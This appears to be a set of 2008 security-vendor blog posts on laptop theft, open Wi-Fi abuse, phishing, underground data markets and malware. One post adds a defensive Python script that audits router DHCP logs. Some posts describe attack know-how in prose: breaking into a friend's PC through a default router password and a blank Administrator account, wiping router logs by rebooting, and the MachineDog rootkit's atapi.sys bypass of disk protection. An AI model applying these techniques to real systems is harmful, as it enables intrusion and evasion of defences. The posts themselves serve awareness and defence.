In June 2008, Dell sponsored a Ponemon Institute study about laptops lost at airports. The study found that 12,000 laptops are lost in U.S. airports each week. Another press release indicated that more than 3,300 were lost at the eight largest airports in Europe, the Middle East, and Africa. Even if a good many are rapidly retrieved or end up at the lost-and-found desk, others vanish into thin air. Somebody, somewhere will be very happy with them.

I decided to blog on this subject because just yesterday I was a speaker at the Eurosec’2008 conference in Paris. Just after my talk, someone working in counterespionage and counterterrorism circles explained that data theft and reselling equipment on the black market were not the only goals of thieves. Thirty percent of these thefts are for industrial espionage, he said. In 70 percent of cases, the machines are stolen to attempt unlawful acts: software piracy, downloading child-abuse images, browsing terrorist and extremist web sites, exchanging information via blogs and forums, and sending threatening email for intimidation or for claiming responsibility for bombings.

When a burglary occurs, thieves often use stolen cars. Some days after the crime, the police often find the burnt-out car at the edge of a forest. Now cybercriminals use the same method: after it has been used, the computer is destroyed and never found again. And it’s far easier to steal a laptop than an automobile.

The Perils Of Leaving Wi-Fi Networks Unsecured

People don’t yet seem to take Wi-Fi security seriously. In spite of oft-repeated warnings, folks with unlimited bandwidth plans believe they are doing a social service by letting neighbors leech their Wi-Fi freely. What they fail to understand is that by doing so they can become an unwitting accessory to cyber crime.

Instead of scouring for anonymous proxies to stay faceless on the Internet, cyber criminals are increasingly targeting unsecured Wi-Fi networks to get the job done. A combination of war-driving tools such as NetStumbler and a list of default router usernames and passwords is all it takes to connect freely to unsecured Wi-Fi networks, especially since most Wi-Fi routers run with the default security settings shipped by the vendor rather than settings configured by the end user.

SOHO routers log every connection and DHCP lease, but these logs are typically held in memory and flushed when the router is rebooted. If an attacker has access to the router’s administrative console (thanks to the default password), a simple restart once the nefarious activities have been carried out erases all tracks.
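The practical defence against that reboot trick is to ship the router’s syslog to a box you control and review the lease records there, since a copy that left the router cannot be erased by restarting it. The block below is an added example written for this page, not code from the post: it assumes the router runs dnsmasq (as OpenWrt and DD-WRT builds do) and forwards syslog, and the log lines, the allow list of your own devices, and the BusyBox “syslogd started” reboot marker are all constructed for the demonstration.

```python
"""Audit DHCP lease lines from a SOHO router's remote syslog copy.

Added example, not code from the original post. Assumes dnsmasq-style
DHCPACK lines and a BusyBox syslogd restart message; sample log lines
and the allow list are constructed for the demonstration.
"""
import re
from typing import Dict, List, NamedTuple, Optional


class Lease(NamedTuple):
    line: int            # position in the log, used to order events
    when: str
    iface: str
    ip: str
    mac: str
    host: Optional[str]  # dnsmasq omits the hostname when the client sent none


LEASE_RE = re.compile(
    r"^(?P<when>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ dnsmasq-dhcp\[\d+\]: "
    r"DHCPACK\((?P<iface>\S+)\) (?P<ip>\d+\.\d+\.\d+\.\d+) "
    r"(?P<mac>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})(?: (?P<host>\S+))?\s*$"
)
# Logged when the router's syslog daemon comes back up, i.e. right after
# the reboot that wiped the on-box copy of the log.
REBOOT_RE = re.compile(r"^(?P<when>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ syslogd started")

# Constructed sample: two known devices, a stranger at 02:17, then a reboot.
SAMPLE_LOG = """\
Jun 14 21:02:11 router dnsmasq-dhcp[812]: DHCPACK(br0) 192.168.1.20 00:1c:b3:aa:bb:01 family-pc
Jun 14 21:40:53 router dnsmasq-dhcp[812]: DHCPACK(br0) 192.168.1.21 00:23:6c:cc:dd:02 iphone
Jun 15 02:17:09 router dnsmasq-dhcp[812]: DHCPACK(br0) 192.168.1.37 00:16:ea:11:22:33
Jun 15 02:59:44 router syslogd started: BusyBox v1.4.2
Jun 15 03:00:05 router dnsmasq-dhcp[812]: DHCPACK(br0) 192.168.1.20 00:1c:b3:aa:bb:01 family-pc
"""

# Devices you own, keyed by MAC address (constructed).
KNOWN: Dict[str, str] = {
    "00:1c:b3:aa:bb:01": "family-pc",
    "00:23:6c:cc:dd:02": "iphone",
}


def parse_leases(text: str) -> List[Lease]:
    """Extract every DHCPACK as a Lease; ignore lines in other formats."""
    leases: List[Lease] = []
    for n, line in enumerate(text.splitlines()):
        m = LEASE_RE.match(line)
        if m:
            leases.append(Lease(n, m["when"], m["iface"], m["ip"],
                                m["mac"].lower(), m["host"]))
    return leases


def find_reboots(text: str) -> List[tuple]:
    """Return (line, timestamp) for each syslogd restart, i.e. each reboot."""
    out = []
    for n, line in enumerate(text.splitlines()):
        m = REBOOT_RE.match(line)
        if m:
            out.append((n, m["when"]))
    return out


def audit(text: str, known: Dict[str, str]) -> Dict[str, object]:
    """Flag leases given to MACs not on the allow list and reboots that followed."""
    unknown = [l for l in parse_leases(text) if l.mac not in known]
    reboots = find_reboots(text)
    # A stranger on the LAN followed by a reboot is the clean-up pattern
    # described above: the on-box log would now show nothing.
    cleanup = any(l.line < r_line for l in unknown for r_line, _ in reboots)
    return {
        "unknown": unknown,
        "reboots": [when for _, when in reboots],
        "cleanup_suspected": cleanup,
    }


if __name__ == "__main__":
    for lease in audit(SAMPLE_LOG, KNOWN)["unknown"]:
        print(f"{lease.when} unknown device {lease.mac} got {lease.ip} "
              f"(hostname: {lease.host or 'none'})")
```

The point of the ordering check is that the reboot itself is the evidence: on the router the log starts fresh at 02:59:44, and only the off-box copy still shows the unknown MAC that leased 192.168.1.37 forty minutes earlier. The allow list is deliberately keyed by MAC rather than IP, because the attacker’s address comes from the same DHCP pool as yours.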

The extent to which an unsecured Wi-Fi connection can be abused is limited only by the imagination of the attacker. Putting on my Dr. Evil hat, here are a couple of wicked acts a Wi-Fi hacker could commit, and get away with undetected, using an unsecured network:

  • Download child pornography
  • Download copyrighted movies and music via P2P
  • Download Warez and abuse your bandwidth
  • Send bomb hoaxes, terror or threatening emails
  • Send spam (sexual aids, pharmacy or money laundering scams)

Any of the above acts could lead to law enforcement knocking on your door. This is not mere speculation; many unsuspecting people have fallen victim. To quote a high-profile example: in the recent serial bomb blasts in India, the emails claiming responsibility for the blasts were sent from unsecured Wi-Fi connections, and it was the unfortunate owners of those connections who were subjected to police questioning and house arrest.

In addition to using an unsecured Wi-Fi network for malicious purposes, an attacker can use it to steal personal information for identity theft. For example:

  • Infiltrate and break into internal machines
  • Modify DNS settings on the router to point to a rogue server
  • Sniff Wi-Fi traffic for usernames and passwords

The scenarios discussed above are neither speculation nor an exhaustive list of the ways unsecured Wi-Fi networks can be abused. They are being enacted by criminals every day around the world.

Now why would you want to be an unwitting host to criminal activity emanating from your IP address, or make yourself vulnerable to identity theft? Be a responsible Netizen and secure your Wi-Fi connection now!

Secure Your Wireless Router Part 2

I was at a friend’s house this past weekend when I asked to connect to his wireless router with my laptop. This friend was not computer savvy so I wasn’t surprised to find that security was not configured on his router.

This reminded me of an article (Secure Your Wireless Router) a colleague of mine at Avert Labs had written several months ago about how more and more homes in China nowadays have wireless routers, but very few people bother to secure them.

I proceeded to lecture my friend about the importance of being security-aware, and the dangers of not being so - identity theft, stolen passwords, private documents, pictures, etc.

To demonstrate my point, I asked his permission to perform a penetration test which he agreed to.

I proceeded with the same steps described in my colleague’s article. I obtained an IP on the unsecured network, found the router’s IP, opened up a browser to that IP and was presented with the router’s administration login page. A quick search online easily gave up the default admin password for this router - “admin”. I tried that and sure enough, got into the admin page.

Next I checked the logs on the router and identified an active host on the network that was not my own. I then tried to open a NetBIOS NULL session with the host which worked. So far everything I tried had worked on the first attempt. Getting the NULL session opened up some opportunities for some good information gathering. For one, I determined that the host was running Windows 2000. More interestingly, I was able to get a list of user accounts. All without the need for a username and password. Only one of the accounts sounded like it was user-created. I tried to map a drive using that account with a blank password, and failed. I tried a few more times before giving up on guessing passwords.

I was using my work laptop so I had a Foundstone Enterprise install handy. I scanned the host for vulnerabilities, looking out for anything remotely exploitable. I came up with a handful, but one check jumped out at me - “Administrator Account Has No Password”. I tested this by mapping a drive with the administrator account and a blank password, half hoping that it was a mis-detection. Alas, the map succeeded and at this point the demonstration was over. I now had full access to my friend’s filesystem, and now the possibilities were endless. Having an Administrator account with a blank password on a Windows machine is such an old security hole that I didn’t even bother to test it early on.

For the home user, here are just a couple of tips to get you started with security and in far better shape than my friend:

  1. Secure your wireless network. Look up how to do it online or have your techie friend do it for you, like I did for mine.
  2. Set a strong password for your Windows Administrator account. Better yet, disable the account.
  3. Disable NULL sessions. Look up how to do it online.

Localized 0-day Once Again: Exploit-TaroDrop.e

One of the issues we have been highlighting in our recent conference presentations and blogs is the emergence of major localized threats around Asia. McAfee Avert Labs discovered yet another unidentified vulnerability in the Japanese word processor Ichitaro last Friday.

This Japanese application has been under targeted attack for several years, and a few 0-day vulnerabilities in it were discovered and exploited in the past. Besides Ichitaro, other popular localized applications are often targeted by 0-day exploits. We also frequently observe exploits targeting vulnerabilities months after they have been patched by the vendor.

Users should stay vigilant about suspicious email attachments and not open unknown files. Be sure to update all your applications, popular or not, with the latest security patches to protect yourself and your organization from known attacks.

These newly crafted malicious documents are detected as Exploit-TaroDrop.e, and the payload as BackDoor-DRZ, in the 5368 DATs.

The vendor has acknowledged the vulnerability and will be posting a patch.

J2ME Security Vulnerabilities Discovered

An independent security research firm has announced several new mobile Java (J2ME) security vulnerabilities. Two of the vulnerabilities affect the Java virtual machine (JVM) on mobile phones, and the other 14 are specific to Nokia Series 40 phones. Series 40 mobiles are not Symbian smartphones; they run only J2ME MIDlets.

The reported vulnerabilities and exploits in the JVM could allow untrusted Java MIDlets to run. Once those are used, relatively recent phones running S40 3rd Edition are open to malicious MIDlets that exploit the others.

According to the researchers the vulnerabilities allow:

  • gaining additional privileges for a malicious MIDlet, even manufacturer or mobile carrier level
  • running a malicious MIDlet when the phone is first turned on
  • accessing files
  • sending SMS/MMS
  • making phone calls
  • reading your contacts
  • accessing the SIM card
  • eavesdropping using the camera and microphone

Java phones used to be affected by malware such as J2ME/Redbrowser or J2ME/Wesber, which caused only premium-rate charges. This is the first time that such phones have been shown vulnerable to more malicious malware.

The security research company has produced a report of more than 170 pages on the vulnerabilities and a number of proof-of-concept (PoC) exploits. Usually when researchers develop PoC code or malicious samples, they provide them directly to the security research community. In this case, the researchers are asking for €20,000 (about $30,000) for early access to the research and the malware. Once vulnerability information is released, attackers will generally attempt to write exploits.

What Is Undetectable Malware?

OMG, undetectable Trojans are coming to get us! At least that’s what a story in The Register says, referring to Limbo 2.

Or else we’ve just found further evidence of the “AV software is for catching unknown threats” myth.

Malware authors selling “guaranteed undetected” Trojans is not news; it has been happening since Trojan development first became motivated by money. The authors test their creations against freely available AV scanners, and if a sample is undetected at that moment, it qualifies as “undetected.” However, that doesn’t mean it will always remain undetected, or that another type of security product, such as a firewall or network intrusion prevention system, won’t detect it.

One amusing example of malware for sale included an end-user license agreement that promised violators would be reported to AV companies so your botnet could be dismantled.

But I digress. :)

The point is that “undetectable Trojan” implies some novel method of storing the malware code on the system such that security software (and likewise the operating system) cannot see it. Limbo 2 does no such thing; as far as security software is concerned, it is a plain PWS-Banker Trojan. I find it disappointing that a security company would describe it otherwise; that smacks of FUD to me.

In other news, this will be my last post for the Avert Labs blog. As of next week, I’ll be the Director of Research for West Coast Labs. Thank you all for reading and commenting on my posts throughout the years. Hearing your opinions has been the most entertaining part of being a blogger!

Are Internet cafes and bars in danger?

Recently, a piece of malware named MachineDog attracted attention within the Chinese security community. The malware itself appears to be a well-designed tiny rootkit, quite different from other malware. One special characteristic is that it is designed to penetrate the hard-disk protection software, as well as the security software, installed in most Internet bars and cafés. This means it can infect most machines in many Internet bars and cafés, in some cases without much resistance.

The malware is composed of a user-mode application and a kernel driver. The application does limited work: extracting the driver, installing it as a service, and communicating with the driver through I/O control codes. Earlier versions of the application did the infection work themselves by sending IRPs to the lower disk driver device (\Device\Harddisk0\DR0) to locate and write userinit.exe on the hard disk directly. In later versions the infection code was improved and moved into the driver itself, leaving the application tiny and simple.

The driver does the important work: the infection that earlier versions implemented in the application. Its infection method is special and interesting, because it can bypass many hard-disk protection products and some security software. First it reads the atapi.sys driver file from the hard disk and searches that driver’s body for the dispatch routine addresses, so that it can bypass any existing dispatch routine that has been inline-hooked. Why atapi.sys? Because the device created by atapi.sys is the last device in every device stack that a disk IRP passes through; the IRP ends there. Sending IRPs to this device avoids all the filter devices and inline hooks in upper devices that security and protection software rely on. The malware then sends IRPs to the partition device dispatch routines in the atapi driver to read and write data directly on the hard disk. It first reads data to locate the sector in which userinit.exe resides, so it knows where to infect. It then writes its injected code to the hard disk by the same route, modifying userinit.exe at that point. Finally, it keeps removing any inline hooks on the atapi devices until it receives the close command from the application.

Most Internet bars and cafés rely excessively on hard-disk protection software and mistakenly believe it can replace security software. Once their machines are infected, the administrator just restores from the backups made by the protection software. This malware takes advantage of that neglect. The attack is so dangerous that once the driver is successfully loaded into the kernel, most hard-disk protection software is nothing but an empty shell, and the administrator still has no idea!

McAfee customers are protected from the threat by DAT 5337.

Reference:

http://article.pchome.net/content-515951.html

http://tech.ccidnet.com/art/1099/20080709/1501723_1.html

http://www.xj.xinhuanet.com/2008-06/20/content_13599327.htm

The S.P.A.M Experiment Final Report

On July 1 we released the results of our S.P.A.M. (Spammed Persistently All Month) Experiment, in which 50 people from around the world surfed the Web unprotected for 30 days. Participants were given permission to go where most Internet users would not dare, in order to discover how much spam they would attract and what the effects would be: go everywhere we have told you not to go, click everything we told you not to click. We then studied the daily blogs and analyzed the spam itself, and confirmed that spammers are as active as ever; they are increasingly using psychological tricks to lure Internet users into parting with their contact details, identity information and cash. The experiment (the first of its kind) clearly shows that spam continues to evolve, using more local languages and cultural nuances and becoming much more targeted in a bid to avoid detection.

Our brave and bold participants were assembled from 10 countries, and by the end of the 30 days they had received more than 104,000 spam emails, an average of 2,096 messages each, or roughly 70 messages a day.

Many of the spam messages received were phishing emails: emails that pose as a trustworthy source in order to criminally acquire sensitive information such as usernames, passwords, and bank account details. Other emails carried viruses, and many led to malware being silently installed by persuading participants to visit unsafe web sites. A number of participants noted a decrease in their computer’s processing speed, as well as an increased number of pop-ups.

The Global ‘Spam League’ (spam messages received, by country):

1. United States 23233
2. Brazil 15856
3. Italy 15610
4. Mexico 12229
5. United Kingdom 11965
6. Australia 9214
7. The Netherlands 6378
8. Spain 5419
9. France 2597
10. Germany 2331

To read more about the participants’ experiences, go here, and make sure you download the ‘Global Spam Diaries’ as well.

Nuwar circulating a fake topic - Beijing earthquake

The Nuwar family is known for using social engineering to trick users into downloading it. As we mentioned in the blog last month, the earthquake in China has been used by malware authors for social engineering for weeks. This time, the most recent Nuwar variant circulates a fake topic: a Beijing earthquake (not the Sichuan earthquake!).

If users click on the fake video image, the file “beijin.exe” (W32/Nuwar@MM) is downloaded. However, users might be infected with Nuwar even if they don’t click: the page contains an iframe linking to malicious JavaScript.

Upon accessing the page, the obfuscated JavaScript is downloaded and run via the injected iframe. The script exploits the RealPlayer vulnerability CVE-2008-1309 and downloads another Nuwar variant. McAfee VSE blocks the script and detects it as “JS/Exploit-Shell.gen”.

At the time of writing, the download file was corrupted.

This is not a phishing site. Now, be a good victim and enter your login credentials in the form!

A few days ago I was browsing a forum when I read a message from someone saying he had received a strange link from one of his MSN contacts, formed like the following:

http://[MSN_login].flatl1n[removed].info

This domain hosts a web page asking for MSN logins and passwords, which points to another page asking for ICQ login credentials:

But let’s examine this page in detail, especially the “Terms of Use”:

“Terms of Use / Privacy Policy:

By filling out this form, you authorize TST Management, Inc to spread the word about this 100% real and upcoming Messenger Community Site.
You will receive your share of the credit in helping us spread the word. This is a harmless Community site which is offering users a platform to meet each other for free.

We do not share your private information with any third parties.
By using our service/website you hereby fully authorize TST Management, Inc to send messages of a commercial nature via Instant Messages and E-Mails on behalf of third parties via the information you provide us. This is not a “phishing” site that attempts to “trick” you into revealing personal information. Everything we do with your information is disclosed here. If you are under eighteen (18), you MUST obtain permission from a parent or guardian before using our website/service.

This page is not affiliated with or operated by Microsoft(tm) or MSN Network(tm).

ANY LIABILITY, INCLUDING WITHOUT LIMITATION ANY LIABILITY FOR DAMAGES CAUSED OR ALLEGEDLY CAUSED BY ANY FAILURE OF PERFORMANCE, ERROR, OMISSION, INTERRUPTION, DEFECT, DELAY IN OPERATION OR TRANSMISSION, COMMUNICATIONS LINE FAILURE, SHALL BE STRICTLY LIMITED TO THE AMOUNT PAID BY OR ON BEHALF OF THE SUBSCRIBER TO THIS SERVICE.

We may temporarily access your MSN account to do a combination
of the following:
1. Send Instant Messages to your friends promoting this site.
2. Introduce new entertaining sites to your friends via Instant Messages.”

Oh well, that reminds me how powerful social engineering is…
The victim received this URL from what is supposed to be one of his MSN contacts, and it is unlikely he will spend a few minutes reading those lines. So I agree that everything the attackers do is published in the Privacy Policy, but I disagree when they say they don’t “trick” people into giving up their login credentials: they use social engineering to get users’ passwords, which is dishonest, and that is a phishing scam!!

Now, here is the funny part of the “Terms of Use”:

“This is a free service. You will not be asked to pay at any time.
You will not be subscribed to anything asking for payment.
This service is made possible by many hours of human effort.

TST Management, Inc reserves the right to change the terms of use / privacy policy at any time without notice. To view the latest version of this privacy policy, simply bookmark this page for future reference.”

So ironic…
And the last part, the one that aroused my curiosity:

“You understand that this agreement shall prevail if there is any conflict between this agreement and the terms of use you accepted when you signed up with MSN. You also understand that by temporarily accessing your msn account, TST Management, Inc is NOT agreeing to MSN’s terms of use and therefore not bound by them.

This agreement shall be construed and governed by the law of the republic of Panama. You expressly consent to the exclusive venue and personal jurisdiction of the courts located in the Republic of panama for any actions arising from or relating to this agreement.

If any provision of this agreement is held to be invalid, illegal or unenforceable for any reason, such invalidity, illegality or unenforceability shall not affect any other provisions of this agreement, and this agreement shall be construed as if such invalid, illegal or unenforceable provision had not been contained herein.

Copyright 2008 TST Management, Inc”

I was wondering whether this website was really hosted in the Republic of Panama, but a whois on the domain showed that the IP address is actually located in Hong Kong:

The Reverse IP field says there are 32 other sites hosted on this server (210.56.53.224).
We can also see that “TST Management, Inc” (the registrant of the domain) owns 412 other domains.
So I did a Google search and was not surprised to find that they are apparently used for phishing scams!
“TST Management, Inc” seems to be another name for “Blue China Group Ltd”, the company that was sued by MySpace last year for mass spamming.

I managed to create a screenshot of the old “Mass Comment Poster” website that belonged to them:

We can see that the Terms of use were very cynical too!!

They also host what they present as a MySpace tracker (called “Stalker Tracker”), which is in fact another phishing scam website:

Besides, the website displays another “typical” Privacy Policy mentioning:

We may temporarily access your MySpace account to do a combination
of the following:
1. Post bulletins to your friends promoting stalkertrack.com.
2. Post comments to your friends promoting stalkertrack.com.
3. Post a blog about our upcoming tracker for your friends to read.
4. Customize your blog header html with a clickable stalkertrack.com ad image.
5. Send a batch of blog invites on your behalf.
6. Send IM invites with a personalized stalkertrack.com message and/or image advertisement attached - to your friends and potential friends and other members.
7. Introduce new entertaining sites to your friends via comments, bulletins, and messages

And guess how they can do that? Once again, just by using the login credentials entered in the form…

Last but not least, once the login credentials are submitted via the MSN/ICQ phishing pages, a PHP script is called to increment an online counter; here are the statistics available at the moment:

This counter seems to track the activity on all their phishing websites, not only a couple of them.

We can see that 92 people were on one of their phishing websites when I looked at the statistics; there were 35,334 unique visitors yesterday, 284,746 visitors since the beginning of June, 3,616,516 visitors last month, and 7,031,582 visitors since the counter was created (in February/March 2008, according to the second screenshot).

Be vigilant about such IM messages and about websites marked as “copyright” to “Blue China Group, Ltd” or “TST Management, Inc”. Whatever the website purports to be, they are certainly requesting your login credentials in an unclear way!!

You got malware… with bugs included!!

Yesterday, while analyzing a variant of a FakeAlert trojan, I saw something funny, a confirmation that when analyzing malware it is rather common to stumble across interesting stuff :)

So, we received a file named 4nlSkgZm.exe, which of course is a really dodgy filename, but we’ll pretend we didn’t notice :P . When I ran this file on my goat machine, it of course started installing itself and displaying the usual “you are infected” popups, but it also decided to be even clearer in telling me I was infected:

Pretty effective way to scare victims!

What happened? Well, nothing too fancy: the malware replaced my existing wallpaper with a dropped image, and then set my current screensaver to “blackster.scr”, which was dropped too. It is interesting to note that “blackster.scr” is a legitimate screensaver, and we are sure the original author never imagined his funny creation being used like this!

All in all a rather effective method of scaring the victims of this threat :-(

CeCOS II - Co-operation and Education is Key

I was at the APWG CeCOS II conference in Akasaka, Tokyo, Japan for the last two days. It was encouraging to see many members not only from academia, security vendors, and anti-phishing groups but also from many law enforcement agencies, including Interpol and the Kyoto Prefecture Police amongst others. There were also several presenters from the online gaming community.

Having such a diverse turn-out certainly helps push greater awareness of a multitude of cyber crime issues. It was very encouraging to see everyone agreeing on better co-operation in shutting down rogue sites, tracking the bad guys and protecting the users. There was also a video crew from NHK, to bring the CeCOS message across to Japanese TV viewers.

Dr. Uchida-san from The Institute of Information Security and Steve Sheng from Carnegie Mellon University (CMU) also presented a different angle on the issue, from the psychological and educational aspects, both of which complement the policy and technology countermeasures.

Shinsuke Honjo and I gave a presentation on Monday to highlight how malware authors are now going all out to attack victims from all cultures. They can craft spam, phishing sites or malware to target diverse cultures and groups of Internet users in the Asia Pacific region. It was interesting for us to have our research corroborated with data from other speakers at the event. Terence Park, a researcher from KrCERT/CC, in particular demonstrated how a Korean document viewer was used as bait to install a password stealer. This was another classic example of how malware authors can use different localized techniques to get their victims.

Overall, the message that seems to be very consistent throughout is co-operation and education. In tackling a global issue like cyber crime, these are both important factors not only in tracking and prosecuting the criminals, but also in better protecting Internet businesses and users.

ICANN slaps registrars who help criminals

It’ll come as no surprise that there are a bunch of domain registrars that are effectively supporting criminal gangs by not acting on reports of domains run for evil deeds and criminal activities. (Or as we say: They don’t wear a glowing white hat!)

I was chatting by email with Garth Bruen from KnujOn the other day, and we agreed that it has been well known for a long time in the industry that certain registrars are “black hat”. He questioned what was being done about it and pointed me at a story they had worked on with the Washington Post on the subject of their top ten, documented here: http://www.knujon.com/registrars/#the_list.

For a different data source (and one that looks very much like our own ;) ) URIBL’s “hall of shame” has been on line for ages and can be viewed here: http://rss.uribl.com/nic/

I don’t take these things at face value, but I’ve been aware of this issue for a couple of years and have even stood up at an APWG conference and shaken my finger at the registries and registrars in the room after an early presentation on double-flux, making sure they knew only they could help fight it.

Well, it looks like Garth’s article and PR worked: the wheels of power at ICANN have turned and they have told the worst registrars to act!

So my hat tip for the month of May has to go to Garth. Cool… nice one… and congratulations!

ICANN states:

“But if those registrars, including those publicly cited, do not investigate and correct alleged inaccuracies reported to ICANN, our escalation procedure can ultimately result in ICANN terminating their accreditation and preventing them from registering domain names,”

I suspect however that the “inaccuracies” relate to the accuracy of whois information and if that is the case I suspect that the registrars will simply start their own privacy services.

NB: Privacy and anonymity are different things if you’re a LEA (Law Enforcement Authority) within your jurisdiction, but to me, the humble lower-middle-class sysadmin (Hi @SRS), and to those outside of their primary jurisdiction, they are effectively the same impenetrable barrier. We repute against domains registered with privacy services because, statistically speaking (in the world of filtering truck-loads of email), they are used as anonymity services more than as privacy services.

Competition time: Just for fun, I’m going to open a book on which registrar will be the first to expire, and on what date, and put a black McAfee baseball cap up for grabs. (We engineers don’t get much SWAG, let alone give it away.) Just leave a message with the registrar you think will stop trading (or be disaccredited by ICANN) first and the date you think they will be gone.

Employees of McAfee, KnujOn and ICANN need not apply, I’m the judge and my decision is final!

Final thoughts: All we need now is for a few of the heavily abused ccTLDs to do the same and dive into the fight before we see more of these.

More Crimeware Arrests

This week’s news brings another report about arrests of people involved with Crimeware. This story is particularly notable due to the large number of individuals being charged, and because it’s been jointly announced by U.S. and Romanian authorities. Many people involved with gathering information on and prosecuting online criminals have complained about the lack of cooperation from certain countries, but this certainly shows that progress is being made in that arena.

One thing I thought was especially interesting in the report was the description of the process that was allegedly being used by the people involved:

    According to the indictment, the Romania-based members of the enterprise obtained thousands of credit and debit card accounts and related personal information by phishing, with more than 1.3 million spam emails sent in one phishing attack. Once directed to a bogus site, victims were then prompted at those sites to enter access device and personal information. The Romanian “suppliers” collected the victims’ information and sent the data to U.S.-based “cashiers” via Internet chat messages. The domestic cashiers used hardware called encoders to record the fraudulently obtained information onto the magnetic strips on the back of credit and debit cards, and similar cards such as hotel keys. Cashiers then directed “runners” to test the fraudulent cards by checking balances or withdrawing small amounts of money at ATMs. The cards that were successfully tested, known as “cashable” cards, were used to withdraw money from ATMs or point-of-sale terminals that the cashiers had determined permitted the highest withdrawal limits. A portion of the proceeds was then wired to the supplier who had provided the access-device information.

This strikes me as a wonderful illustration of the resources that are now being put into the process by criminals. This isn’t a simple operation with some lone kid in his basement; this involves a network of people gathering information and testing, and relatively expensive card-writer hardware.

You have to pay for quality

The media frequently speak about the underground economy and quote price ranges for various private goods available for sale. I recently read that the trend was bearish, but let there be no misunderstanding about that: if the quality is there, the price will still be high. It is just like the price of food: you have the hard-discount and the luxury stores!!

With this post, I wish to be more precise regarding the prices charged by some cybercriminal groups around the globe.

Last Friday morning in France, my investigations led me to a site proposing top-quality data for a higher price than usual. But when we look at this data we understand that, as everywhere, you have to pay for quality. The first offer concerned bank logons. As you can see in the following screenshot, pricing depends on available balance, bank organization and country. Additional information such as PIN and transfer passphrase is also given when necessary:


For such prices, the seller offers some guarantees. For example, the purchase is covered by replacement if you are unable, within 24 hours, to log into the account using the provided details.

The selling site also proposes US, Austrian and Spanish credit cards with full information:

  • ccnumber
  • cvv2
  • exp.date
  • name
  • address
  • city
  • state/province
  • zip/postal
  • phone-number
  • SSN(US Only)
  • DL#
  • MMN


It is also possible to purchase skimmers (for ATMs) and “dump tracks” to create fake credit cards. Here too, cost is in line with quality:


Depending on the price, you can choose your bank among various lists; more than 900 choices for North America or European countries:


Many other offers are available like shop administrative area accesses (back end of an online store where all the customer details are stored – from Name, SSN, DOB, Address, Phone number to CC) or UK or Swiss Passport information:


And to convince prospective clients, the site offers some free data to demonstrate their know-how. I partially anonymized some of this data so I could provide an example. If you recognize yourself, do not hesitate to contact the police force so that they may institute legal proceedings.


Mobile phone malware launders money through an online game

We have been in contact with one of Germany’s criminal investigation authorities (LKA). This is a case in which a malicious program running on mobile phones was making unauthorised calls. All these calls were connecting to one and the same SMS number, which is used to top up the amount of virtual money in one of the online games. Topping up in-game cash via SMS messages is a scheme frequently used by online game vendors.

This is a really interesting twist because in the past malware writers simply programmed malware (either on a desktop or on a mobile device) to call a premium phone number (one where the cost of a call is high). Of course, with this old method it is easier to trace the destination of funds because for each such call real money is transferred from a phone company to the owner of the premium number. So the principle “follow the money” to track the perpetrators usually works.

This new and indirect way of laundering money through an online game makes it significantly more difficult to track the destination - several in-game assets’ transfers can be made before the money is taken out of the game through real-money trading (RMT - it is a bannable offence in most online games but some games allow that - for example, Second Life).

Our advice is not to use programs for mobile phones that come from untrusted sources (like game forums, Internet newsgroups, Emails, P2P networks, blogs, etc.)

Avert Labs would kindly ask all mobile phone users to be vigilant and submit suspicious programs for our analysis. The easiest way is to use our online Webimmune service, www.webimmune.net.

Beware of Forgeries

A recent report by the OECD (Organisation for Economic Co-operation and Development) indicated that counterfeit and pirated goods in 2005 could have had a value of up to 200 billion U.S. dollars.

One path to fake goods is via spam, which frequently offers counterfeit medicines and replica watches. A recent post from the French CERT-LEXSI blog caught my attention regarding fake luxury mobile phones selling for absolutely unbeatable prices.

These phones are normally manufactured by Vertu, a British subsidiary of Nokia, and are sold in luxury shops in Monte Carlo, Cannes, or Beverly Hills. On their official top-quality site (www.vertu.com), prices are not mentioned, but by visiting some authorised retailer Web sites I found exorbitant figures. Some mobiles, bedecked in gold and diamonds, exceed $90,000. Really too expensive for me!

Using Google, it’s really easy to find fake sites offering these counterfeit marvels. In fact it is easier to find the fake sites than the authorized ones!

And the prices–assuming you need one of these–are attractive: less than $1,000 for a copy of an original that sells for $97,300.

Regular spam campaigns promote such Vertu “replica” sites. Be vigilant, however, because appearances can be deceiving. Sites are numerous and their common feature is their high-quality, professional look–with black backgrounds that imitate the official site.

These sites are hosted at various providers in various countries (USA, Germany, and Hong Kong). Some of them seem clean; others are known for bulletproof hosting services and their relationship with the Russian Business Network, an alleged cybercrime organization. The registrars are also diverse (Estonia, Russia, and Korea) but more questionable. It is surprising that these do not require any name verification before accepting registrations. But once you know that a lot of spam and malware-related Web sites come from them, their permissiveness is easier to understand. Registrant addresses and e-mails give us an inkling regarding the nationality of their owners: China and Russia.

For the potential buyer, the key issue concerns the risk. The Swiss Watch Industry clearly points out that the buyer is the first victim, because purchasing counterfeits is:

  • Agreeing that piracy is OK; the counterfeiter seeks to appropriate somebody else’s hard work and investment.
  • Supporting and financing organized crime; links between counterfeiting activities and criminal networks have been established in many cases.
  • Accepting underground and child labor.
  • Endangering your own health and safety; the risk is real with medicines, aircraft and auto spare parts, medical supplies, and cosmetics.
  • Reducing employment and stifling growth; this form of criminality contributes to the reduction of employment, which is estimated to cost more than 200,000 jobs worldwide per year.
  • Being liable to criminal sanctions; the buyer may face criminal and financial sanctions. The mere possession of counterfeits is illegal in many countries. Furthermore, penalties could be claimed by legitimate intellectual property rights’ owners. Customs also can seize and destroy illegal items and assess fines.

And if these considerations don’t stop you, remember you run the risk of not receiving the goods you pay for; instead you might have your banking details stolen and reused in future malevolent activities. None of the sites I visited yesterday offered a secure Internet payment system; one of them housed a hidden Iframe linked to a known password-stealing Trojan.

Race to Zero, what?

There’s been considerable stink lately about the Race to Zero contest that is to be held at Defcon. I, for one, am a bit perplexed by this. This article from ZDNet Australia is what finally made my eyes cross in confusion/aggravation.

I don’t know at what point the collective “wisdom” became that signature-based AV was ever intended to be about defending against every threat ever devised, before it was ever devised. Signature-based scanners are intended to detect and clean known threats. If you modify a known threat, it’s not really “known” anymore, is it? Now it’s a variant of a known threat.

It’s certainly desirable to have protection against all threats, known and not-yet-known. This is what things like firewalls, Intrusion Prevention Systems, Data Leakage Prevention and all those other wonderful security products are intended to do, in concert with AV. Most AV software now also includes proactive static detection like Generic and Heuristic detection, along with more dynamic detection like emulation or behavioral detection. Many AV programs now also include broader security functionality like a firewall or IPS.

